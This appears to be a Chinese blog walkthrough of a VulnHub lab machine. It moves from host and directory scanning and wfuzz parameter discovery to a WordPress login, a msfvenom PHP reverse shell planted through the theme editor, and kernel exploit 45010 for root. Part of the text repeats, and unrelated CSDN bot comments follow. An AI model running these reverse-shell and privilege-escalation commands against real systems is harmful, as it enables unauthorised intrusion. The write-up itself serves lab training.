[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
文章目录
- 1.主机发现,确定攻击目标
- 2.端口发现,寻找突破口
- 3.web渗透
- dirb扫描web目录
- fuzz获取正确url参数
- WordPress漏洞利用
- 获取wordpress用户名
- 4.文件上传,反弹连接
- 5.msf提权
- **解决gcc编译版本问题:**
靶机地址
实验目的:掌握渗透测试基本流程和渗透工具
涉及渗透工具知识点:
-
dirb 扫描web路径
-
fuzz获取url正确参数名
-
msf漏洞检索和利用
-
WordPress上传文件漏洞,反弹
已知渗透信息:
靶机安装在vmvare虚拟机中,使用NAT模式,网段192.168.31.0/24中
攻击主机:kali linux主机
渗透目的:
- 进入系统,获取靶机flag
1.主机发现,确定攻击目标
nmap方式(也可用命令行)得到主机ip:192.168.31.100,真实渗透环境肯定扫描出多个主机,需要收集多种渗透信息,分别
2.端口发现,寻找突破口
#对全端口扫描
nmap -p 1-65535 -T4 -A -v 192.168.31.100
3.web渗透
根据扫描出的服务,从易入侵的web服务开始继续渗透
遇到web有什么渗透思路:
- 目录扫描
- 请求参数fuzz
- 尝试访问敏感文件robots.txt
- 用户名和密码爆破
- 看网页源码(看有没有信息可利用)
在信息安全领域中,Fuzzing(模糊测试)是一种常用的黑盒测试技术,也是信息收集的一种方法之一。Fuzzing通过向目标系统输入大量随机数据来测试系统的鲁棒性和安全性。Fuzz测试通常涉及构建一个能够生成大量随机数据的程序,然后将这些数据发送到目标系统或应用程序中,以发现潜在的漏洞或错误。
在信息收集中,Fuzzing通常用于测试网络服务或应用程序的漏洞和弱点。通过向目标服务器发送各种类型的随机数据,可以发现一些潜在的漏洞和安全问题,例如缓冲区溢出、拒绝服务攻击、SQL注入等。Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。
总之,Fuzzing是一种非常有用的信息收集技术,可以帮助安全专业人员发现潜在的安全问题和漏洞。但需要注意的是,Fuzzing可能会导致目标系统崩溃或不稳定,因此在实施Fuzzing时需要谨慎,并遵循相关的道德和法律规范。
dirb扫描web目录
└─# dirb http://192.168.31.100/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jul 1 00:37:21 2023
URL_BASE: http://192.168.31.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.31.100/ ----
+ http://192.168.31.100/dev (CODE:200|SIZE:131)
+ http://192.168.31.100/index.php (CODE:200|SIZE:136)
==> DIRECTORY: http://192.168.31.100/javascript/
+ http://192.168.31.100/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.31.100/wordpress/
---- Entering directory: http://192.168.31.100/javascript/ ----
==> DIRECTORY: http://192.168.31.100/javascript/jquery/
---- Entering directory: http://192.168.31.100/wordpress/ ----
+ http://192.168.31.100/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-includes/
+ http://192.168.31.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.31.100/javascript/jquery/ ----
+ http://192.168.31.100/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/ ----
+ http://192.168.31.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/includes/
+ http://192.168.31.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/user/
---- Entering directory: http://192.168.31.100/wordpress/wp-content/ ----
+ http://192.168.31.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.31.100/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/network/ ----
+ http://192.168.31.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.31.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/user/ ----
+ http://192.168.31.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.31.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.31.100/wordpress/wp-content/plugins/ ----
+ http://192.168.31.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.31.100/wordpress/wp-content/themes/ ----
+ http://192.168.31.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.31.100/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Jul 1 00:38:39 2023
DOWNLOADED: 46120 - FOUND: 15
web内容扫描中得出,此靶机对外提供wordpress服务,通过访问url路径得到几个有用路径信息:
- http://192.168.31.100/dev (CODE:200|SIZE:131)
- ==> DIRECTORY: http://192.168.31.100/wordpress/
给出了提示:用fuzz工具和找出正确参数,接着传入参数值location.txt继续下一步
fuzz获取正确url参数
fuzz的用法:
- 找到url参数
- sql注入
- 密码暴力破解
- 绕过waf
#用参数字典访问网站,得到返回状态码、行数、字符数等统计信息,在统计信息中找出不同于其它的访问结果,拿到正确的参数
#第一遍访问获取请求返回统计信息
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.31.100/index.php?FUZZ
#第二遍访问通过参数过滤出不同与其它哪项,参数 --hw 12 从第一次访问中等到返回字数12
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.31.100/index.php?FUZZ
找到正确参数file,根据提示访问
拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。
根据提示得到关键字“follow_the_ippsec”,哪这个关键字和什么有关?目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息
WordPress漏洞利用
获取wordpress用户名
**方式一:**经验获取用户名
WordPress搭建成功后自动发布一封有用户名的文章,因此得到wordpress登录用户名为victor
尝试用账户和关键词密码发现可以登录:
接下来就针对WordPress渗透发现侵入系统的漏洞
方式二:指纹工具获取WordPress用户
关于WordPress的指纹工具
- wpscan
- cmseek
cmseek安装:
apt-get update
apt-get install -y cmseek
wpscan枚举WordPress用户也得到用户victor
#枚举WordPress用户完整输出
# wpscan --url http://192.168.31.100/wordpress -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.31.100/wordpress/ [192.168.31.100]
[+] Started: Sat Jul 1 01:32:10 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.31.100/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.31.100/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.31.100/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.31.100/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.31.100/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
| - http://192.168.31.100/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.5
| Style URL: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Jul 1 01:32:12 2023
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 16.91 KB
[+] Data Received: 20.512 MB
[+] Memory used: 168.305 MB
[+] Elapsed time: 00:00:02
4.文件上传,反弹连接
登录进入后,如何开始WordPress渗透?
- 文件上传漏洞
生成反弹连接脚本:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=6666 -o shell.php
在wordpress中利用主题编辑功能对当前主题编辑,找到可编辑的php文件(图中如secret.php),然后粘贴上述生成的反弹连接php
在kali linux 中用msfconsole命令启动监听6666的任务
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.31.101
lhost => 192.168.31.101
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > exploit
当访问
http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/secret.php (这是主题访问路径文件访问方式,记得路径就行,这是WordPress目录结构规范)
到此可以执行在目标机器上执行一部分命令,通过sysinfo命令得知系统版本时ubuntu16.04.2
5.msf提权
接下来就是提权操作,执行更多命令
提权思路:
如下演示通过msf操作系统漏洞数据库,漏洞利用获取权限
msfconsole 中执行:
searchsploit 16.04 Ubuntu
根据内核版本得到可利用的漏洞,编译漏洞利用程序:
/usr/share/exploitdb/exploits/linux/local/45010.c
并上传靶机可执行路径/tmp下,执行即可提权
在kali-linux 上编译提权程序
cp /usr/share/exploitdb/exploits/linux/local/45010.c /root
cd /root
gcc 45010.c -o 45010 # 由于gcc版本问题,编译后在靶机上执行会报错,见下面解决
msconsole中执行:
- upload上传
- shell中执行45010提权程序
执行报错:./45010: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34’ not found (required by ./45010)
解决gcc编译版本问题:
通过反弹shell查看靶机glibc版本:
ldd --version
在kali-linux上
apt-get install -y autoconf
git clone https://github.com/NixOS/patchelf.git
cd patchelf
./bootstrap.sh
./configure
make
make check
sudo make install
PatchELF是一个简单的实用程序,用于修改现有的ELF可执行文件和库。具体而言,它可以执行以下操作:
更改可执行文件的动态加载程序(“ELF 解释器”):
$ patchelf --set-interpreter /lib/my-ld-linux.so.2 my-program
更改可执行文件和库
RPATH
:$ patchelf --set-rpath /opt/my-libs/lib:/other-libs my-program
缩小可执行文件和库
RPATH
:$ patchelf --shrink-rpath my-program
通过glibc-all-in-one库下载靶机对应版本gcc编译环境:
gcc -Wl,-rpath='/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64',-dynamic-linker='/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-linux-x86-64.so.2' -s 45010.c -o 45010V2
重新上传并执行
不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!芭比Q!
不过使用kali linux 2021-02-08后成功提权。也验证的一个事:有时新版kali linux能用上新工具,对于旧漏洞脚本不一定兼容,准备一个低版本的kali linux也是必要。
提权效果
图中靶机ip变为192.168.31.102,因为dhcp重新分配了ip,不影响
靶机一般在root用户放置flag文件,用提权root账号就可以获取flag,打靶完成!!!
不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!芭比Q!
不过使用kali linux 2021-02-08后成功提权。也验证的一个事:有时新版kali linux能用上新工具,对于旧漏洞脚本不一定兼容,准备一个低版本的kali linux也是必要。
提权效果
图中靶机ip变为192.168.31.102,因为dhcp重新分配了ip,不影响
靶机一般在root用户放置flag文件,用提权root账号就可以获取flag,打靶完成!!!
CSDN-Ada助手: 恭喜您写了这篇关于高效学习k8s对象yaml文件编写的博客!看到标题就觉得很有用,期待能够从中学到更多的知识。同时,建议您可以继续分享一些实战经验,例如如何解决一些常见的问题,或者如何应对一些具有挑战性的场景。期待您的下一篇文章! CSDN 正在通过评论红包奖励优秀博客,请看红包流:https://bbs.csdn.net/?type=4&header=0&utm_source=csdn_ai_ada_blog_reply3,我们会奖励持续创作和学习的博主,请看:https://bbs.csdn.net/forums/csdnnews?typeId=116148&utm_source=csdn_ai_ada_blog_reply3
CSDN-Ada助手: 恭喜你写了这么棒的一篇博客,介绍了scoop这个非常实用的window开发环境包管理工具。希望你能继续保持创作的热情,为我们带来更多有关开发环境的实用技巧和工具。下一篇博客不妨可以介绍一些实用的开发工具或者编程语言的使用技巧,让更多的人受益。再次祝贺你,期待你的下一篇博客。 CSDN 会根据你创作的前四篇博客的质量,给予优秀的博主博客红包奖励。请关注 https://bbs.csdn.net/forums/csdnnews?typeId=116148&utm_source=csdn_ai_ada_blog_reply4 看奖励名单。
CSDN-Ada助手: 恭喜您撰写了第20篇博客,题目为“网络基础必备知识”。您的博客内容一直以来都非常实用,对于我们这些对网络基础知识还不够熟悉的用户来说,十分有用。希望您能够继续保持创作的热情,为我们带来更多有价值的知识。同时,也建议您在未来的创作中,能够结合个人经验和实践,为我们带来更加深入的分析和思考。再次感谢您的付出和努力! CSDN 会根据你创作的博客的质量,给予优秀的博主博客红包奖励。请关注 https://bbs.csdn.net/forums/csdnnews?typeId=116148&utm_source=csdn_ai_ada_blog_reply20 看奖励名单。
CSDN-Ada助手: 恭喜你写了第10篇博客!看到你在探讨k8s集群包管理helm的文章,我不禁想起自己也曾经在这个领域里摸爬滚打的经历。不过,你这篇文章写得非常棒!对helm的使用和优势,你做了非常详细的介绍,让我受益匪浅。接下来,我想提出一个创作建议,希望你能够尝试探讨一下helm的一些局限性和不足之处,或者是对于helm的集成和扩展方面的讨论。期待你的新作品! CSDN 会根据你创作的博客的质量,给予优秀的博主博客红包奖励。请关注 https://bbs.csdn.net/forums/csdnnews?typeId=116148&utm_source=csdn_ai_ada_blog_reply10 看奖励名单。
CSDN-Ada助手: 恭喜您写了第9篇博客,内容关于k8s服务发现与暴露的探讨非常精彩。您从多个角度深入分析了这个话题,让读者们深入了解了k8s服务发现与暴露的机制和原理。同时,您的写作风格也很清晰易懂,让读者们能够轻松理解和学习。 希望您能继续保持创作的热情,分享更多有价值的技术内容。下一步建议可以考虑从实践角度出发,分享您在实际应用中的经验和教训,对读者们的实践能力也会有很大的帮助。再次感谢您的分享,期待您更多的优秀作品! CSDN 会根据你创作的博客的质量,给予优秀的博主博客红包奖励。请关注 https://bbs.csdn.net/forums/csdnnews?typeId=116148&utm_source=csdn_ai_ada_blog_reply9 看奖励名单。